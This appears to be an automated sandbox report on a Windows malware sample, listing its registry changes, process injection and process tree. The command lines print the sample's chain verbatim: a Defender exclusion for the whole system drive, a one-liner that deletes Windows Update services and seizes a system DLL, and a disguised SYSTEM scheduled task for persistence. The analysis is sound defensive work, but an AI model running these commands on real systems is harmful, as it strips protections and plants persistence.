Analysis
Max time kernel: 308s
Max time network: 318s
Platform: windows10_x64
Resource: win10-20220414-en
Submitted: 10-05-2022 22:15

Static task: static1
Behavioral task: behavioral1
Sample: e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe
Resource: win7-20220414-en
General
Target: e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe
Size: 5.3MB
MD5: 52fdd7f3ed1b50bc5794983a37cb4064
SHA1: 4a185751e9e94dccb3330ca79f893de7ca080482
SHA256: e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2
SHA512: 4f8c70f866320cdd3a38beb9fdd2820840171677e0e1ad993c05dbe5c64b5b919d2455c01ce619b96d6cdeabf703299301bd766e3c6860b44a7b19fe67db028f
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes (description | ioc | process):
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | reg.exe
-
Executes dropped EXE 1 IoCs
Processes (pid | process):
1632 | services.exe
-
Possible privilege escalation attempt 4 IoCs
Processes (pid | process):
3964 | takeown.exe
2840 | icacls.exe
2736 | takeown.exe
872 | icacls.exe
-
Stops running service(s) 3 TTPs
-
Modifies file permissions 1 TTPs 4 IoCs
Processes (pid | process):
3964 | takeown.exe
2840 | icacls.exe
2736 | takeown.exe
872 | icacls.exe
-
Drops file in System32 directory 4 IoCs
Processes (description | ioc | process):
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | powershell.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log | conhost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | powershell.exe
-
Suspicious use of SetThreadContext 1 IoCs
Processes (description | pid | process | target process):
PID 1148 set thread context of 1344 | 1148 | conhost.exe | conhost.exe
-
Drops file in Program Files directory 2 IoCs
Processes (description | ioc | process):
File created | C:\Program Files\Windows\services.exe | conhost.exe
File opened for modification | C:\Program Files\Windows\services.exe | conhost.exe
-
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 52 IoCs
Processes (description | ioc | process):
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | conhost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | conhost.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | conhost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | conhost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | conhost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe
-
Modifies registry key 1 TTPs 18 IoCs
Processes (pid | process):
2328 | reg.exe
3464 | reg.exe
644 | reg.exe
3212 | reg.exe
3860 | reg.exe
4048 | reg.exe
3812 | reg.exe
1752 | reg.exe
4028 | reg.exe
2136 | reg.exe
2176 | reg.exe
1108 | reg.exe
1812 | reg.exe
1688 | reg.exe
1020 | reg.exe
2848 | reg.exe
2352 | reg.exe
2204 | reg.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes (pid | process):
1020 | powershell.exe
1020 | powershell.exe
1020 | powershell.exe
1928 | conhost.exe
3868 | powershell.exe
3868 | powershell.exe
3868 | powershell.exe
1148 | conhost.exe
-
Suspicious use of AdjustPrivilegeToken 39 IoCs
Processes (description | pid | process):
Token: SeDebugPrivilege | 1020 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 1020 | powershell.exe
Token: SeSecurityPrivilege | 1020 | powershell.exe
Token: SeTakeOwnershipPrivilege | 1020 | powershell.exe
Token: SeLoadDriverPrivilege | 1020 | powershell.exe
Token: SeSystemProfilePrivilege | 1020 | powershell.exe
Token: SeSystemtimePrivilege | 1020 | powershell.exe
Token: SeProfSingleProcessPrivilege | 1020 | powershell.exe
Token: SeIncBasePriorityPrivilege | 1020 | powershell.exe
Token: SeCreatePagefilePrivilege | 1020 | powershell.exe
Token: SeBackupPrivilege | 1020 | powershell.exe
Token: SeRestorePrivilege | 1020 | powershell.exe
Token: SeShutdownPrivilege | 1020 | powershell.exe
Token: SeDebugPrivilege | 1020 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 1020 | powershell.exe
Token: SeRemoteShutdownPrivilege | 1020 | powershell.exe
Token: SeUndockPrivilege | 1020 | powershell.exe
Token: SeManageVolumePrivilege | 1020 | powershell.exe
Token: 33 | 1020 | powershell.exe
Token: 34 | 1020 | powershell.exe
Token: 35 | 1020 | powershell.exe
Token: 36 | 1020 | powershell.exe
Token: SeTakeOwnershipPrivilege | 3964 | takeown.exe
Token: SeDebugPrivilege | 1928 | conhost.exe
Token: SeDebugPrivilege | 3868 | powershell.exe
Token: SeAssignPrimaryTokenPrivilege | 3868 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 3868 | powershell.exe
Token: SeSecurityPrivilege | 3868 | powershell.exe
Token: SeTakeOwnershipPrivilege | 3868 | powershell.exe
Token: SeLoadDriverPrivilege | 3868 | powershell.exe
Token: SeSystemtimePrivilege | 3868 | powershell.exe
Token: SeBackupPrivilege | 3868 | powershell.exe
Token: SeRestorePrivilege | 3868 | powershell.exe
Token: SeShutdownPrivilege | 3868 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 3868 | powershell.exe
Token: SeUndockPrivilege | 3868 | powershell.exe
Token: SeManageVolumePrivilege | 3868 | powershell.exe
Token: SeDebugPrivilege | 1148 | conhost.exe
Token: SeTakeOwnershipPrivilege | 2736 | takeown.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes (description | pid | process | target process):
PID 1352 wrote to memory of 1928 | 1352 | e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe | conhost.exe
PID 1352 wrote to memory of 1928 | 1352 | e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe | conhost.exe
PID 1352 wrote to memory of 1928 | 1352 | e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe | conhost.exe
PID 1928 wrote to memory of 3500 | 1928 | conhost.exe | cmd.exe
PID 1928 wrote to memory of 3500 | 1928 | conhost.exe | cmd.exe
PID 3500 wrote to memory of 1020 | 3500 | cmd.exe | powershell.exe
PID 3500 wrote to memory of 1020 | 3500 | cmd.exe | powershell.exe
PID 1928 wrote to memory of 1820 | 1928 | conhost.exe | cmd.exe
PID 1928 wrote to memory of 1820 | 1928 | conhost.exe | cmd.exe
PID 1820 wrote to memory of 232 | 1820 | cmd.exe | sc.exe
PID 1820 wrote to memory of 232 | 1820 | cmd.exe | sc.exe
PID 1820 wrote to memory of 192 | 1820 | cmd.exe | sc.exe
PID 1820 wrote to memory of 192 | 1820 | cmd.exe | sc.exe
PID 1820 wrote to memory of 320 | 1820 | cmd.exe | sc.exe
PID 1820 wrote to memory of 320 | 1820 | cmd.exe | sc.exe
PID 1820 wrote to memory of 188 | 1820 | cmd.exe | sc.exe
PID 1820 wrote to memory of 188 | 1820 | cmd.exe | sc.exe
PID 1820 wrote to memory of 2324 | 1820 | cmd.exe | sc.exe
PID 1820 wrote to memory of 2324 | 1820 | cmd.exe | sc.exe
PID 1820 wrote to memory of 3212 | 1820 | cmd.exe | reg.exe
PID 1820 wrote to memory of 3212 | 1820 | cmd.exe | reg.exe
PID 1820 wrote to memory of 2204 | 1820 | cmd.exe | reg.exe
PID 1820 wrote to memory of 2204 | 1820 | cmd.exe | reg.exe
PID 1820 wrote to memory of 4028 | 1820 | cmd.exe | reg.exe
PID 1820 wrote to memory of 4028 | 1820 | cmd.exe | reg.exe
PID 1820 wrote to memory of 1812 | 1820 | cmd.exe | reg.exe
PID 1820 wrote to memory of 1812 | 1820 | cmd.exe | reg.exe
PID 1820 wrote to memory of 3860 | 1820 | cmd.exe | reg.exe
PID 1820 wrote to memory of 3860 | 1820 | cmd.exe | reg.exe
PID 1820 wrote to memory of 3964 | 1820 | cmd.exe | takeown.exe
PID 1820 wrote to memory of 3964 | 1820 | cmd.exe | takeown.exe
PID 1820 wrote to memory of 2840 | 1820 | cmd.exe | icacls.exe
PID 1820 wrote to memory of 2840 | 1820 | cmd.exe | icacls.exe
PID 1928 wrote to memory of 1108 | 1928 | conhost.exe | cmd.exe
PID 1928 wrote to memory of 1108 | 1928 | conhost.exe | cmd.exe
PID 1108 wrote to memory of 1340 | 1108 | cmd.exe | schtasks.exe
PID 1108 wrote to memory of 1340 | 1108 | cmd.exe | schtasks.exe
PID 1928 wrote to memory of 512 | 1928 | conhost.exe | cmd.exe
PID 1928 wrote to memory of 512 | 1928 | conhost.exe | cmd.exe
PID 512 wrote to memory of 3616 | 512 | cmd.exe | schtasks.exe
PID 512 wrote to memory of 3616 | 512 | cmd.exe | schtasks.exe
PID 1632 wrote to memory of 1148 | 1632 | services.exe | conhost.exe
PID 1632 wrote to memory of 1148 | 1632 | services.exe | conhost.exe
PID 1632 wrote to memory of 1148 | 1632 | services.exe | conhost.exe
PID 1148 wrote to memory of 1368 | 1148 | conhost.exe | cmd.exe
PID 1148 wrote to memory of 1368 | 1148 | conhost.exe | cmd.exe
PID 1368 wrote to memory of 3868 | 1368 | cmd.exe | powershell.exe
PID 1368 wrote to memory of 3868 | 1368 | cmd.exe | powershell.exe
PID 1820 wrote to memory of 2328 | 1820 | cmd.exe | reg.exe
PID 1820 wrote to memory of 2328 | 1820 | cmd.exe | reg.exe
PID 1820 wrote to memory of 1688 | 1820 | cmd.exe | reg.exe
PID 1820 wrote to memory of 1688 | 1820 | cmd.exe | reg.exe
PID 1820 wrote to memory of 2136 | 1820 | cmd.exe | reg.exe
PID 1820 wrote to memory of 2136 | 1820 | cmd.exe | reg.exe
PID 1820 wrote to memory of 1020 | 1820 | cmd.exe | reg.exe
PID 1820 wrote to memory of 1020 | 1820 | cmd.exe | reg.exe
PID 1820 wrote to memory of 2388 | 1820 | cmd.exe | schtasks.exe
PID 1820 wrote to memory of 2388 | 1820 | cmd.exe | schtasks.exe
PID 1820 wrote to memory of 224 | 1820 | cmd.exe | schtasks.exe
PID 1820 wrote to memory of 224 | 1820 | cmd.exe | schtasks.exe
PID 1820 wrote to memory of 220 | 1820 | cmd.exe | schtasks.exe
PID 1820 wrote to memory of 220 | 1820 | cmd.exe | schtasks.exe
PID 1820 wrote to memory of 3512 | 1820 | cmd.exe | schtasks.exe
PID 1820 wrote to memory of 3512 | 1820 | cmd.exe | schtasks.exe
Processes
(Process tree; indentation shows the parent/child level, each entry lists the image path, the command line, and the signatures that fired on it.)
-
C:\Users\Admin\AppData\Local\Temp\e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe"
  - Suspicious use of WriteProcessMemory
-
  C:\Windows\System32\conhost.exe
    Command line: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe"
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
-
    C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGIAYgB2ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABsAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawB3AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdAB0AGYAYQAjAD4A"
      - Suspicious use of WriteProcessMemory
-
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell -EncodedCommand "PAAjAGIAYgB2ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABsAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawB3AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdAB0AGYAYQAjAD4A"
        (The -EncodedCommand argument is base64 of UTF-16LE text and decodes to: <#bbv#> Add-MpPreference <#dlh#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#kwk#> -Force <#ttfa#> ; that is, a Defender exclusion for the user profile and the whole system drive, padded with empty block comments.)
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
-
    C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      - Suspicious use of WriteProcessMemory
-
      C:\Windows\system32\sc.exe
        Command line: sc stop UsoSvc
-
      C:\Windows\system32\sc.exe
        Command line: sc stop WaaSMedicSvc
-
      C:\Windows\system32\sc.exe
        Command line: sc stop wuauserv
-
      C:\Windows\system32\sc.exe
        Command line: sc stop bits
-
      C:\Windows\system32\sc.exe
        Command line: sc stop dosvc
-
      C:\Windows\system32\reg.exe
        Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
        - Modifies registry key
-
      C:\Windows\system32\reg.exe
        Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
        - Modifies registry key
-
      C:\Windows\system32\reg.exe
        Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
        - Modifies security service
        - Modifies registry key
-
      C:\Windows\system32\reg.exe
        Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
        - Modifies registry key
-
      C:\Windows\system32\reg.exe
        Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
        - Modifies registry key
-
      C:\Windows\system32\takeown.exe
        Command line: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken
-
      C:\Windows\system32\icacls.exe
        Command line: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        - Possible privilege escalation attempt
        - Modifies file permissions
-
      C:\Windows\system32\reg.exe
        Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
        - Modifies registry key
-
      C:\Windows\system32\reg.exe
        Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        - Modifies registry key
-
      C:\Windows\system32\reg.exe
        Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        - Modifies registry key
-
      C:\Windows\system32\reg.exe
        Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        - Modifies registry key
-
      C:\Windows\system32\schtasks.exe
        Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
-
      C:\Windows\system32\schtasks.exe
        Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
-
      C:\Windows\system32\schtasks.exe
        Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
-
      C:\Windows\system32\schtasks.exe
        Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
-
      C:\Windows\system32\schtasks.exe
        Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
-
      C:\Windows\system32\schtasks.exe
        Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
-
      C:\Windows\system32\schtasks.exe
        Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
-
    C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
      - Suspicious use of WriteProcessMemory
-
      C:\Windows\system32\schtasks.exe
        Command line: schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
        - Creates scheduled task(s)
-
    C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
      - Suspicious use of WriteProcessMemory
-
      C:\Windows\system32\schtasks.exe
        Command line: schtasks /run /tn "GoogleUpdateTaskMachineQC"
-
C:\Program Files\Windows\services.exe
  Command line: "C:\Program Files\Windows\services.exe"
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
-
  C:\Windows\System32\conhost.exe
    Command line: "C:\Windows\System32\conhost.exe" "C:\Program Files\Windows\services.exe"
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
-
    C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGIAYgB2ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABsAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawB3AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdAB0AGYAYQAjAD4A"
      - Suspicious use of WriteProcessMemory
-
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell -EncodedCommand "PAAjAGIAYgB2ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABsAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawB3AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdAB0AGYAYQAjAD4A"
        (Same encoded command as the first run: Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force, with empty block comments between the tokens.)
        - Drops file in System32 directory
        - Modifies data under HKEY_USERS
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
-
    C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN 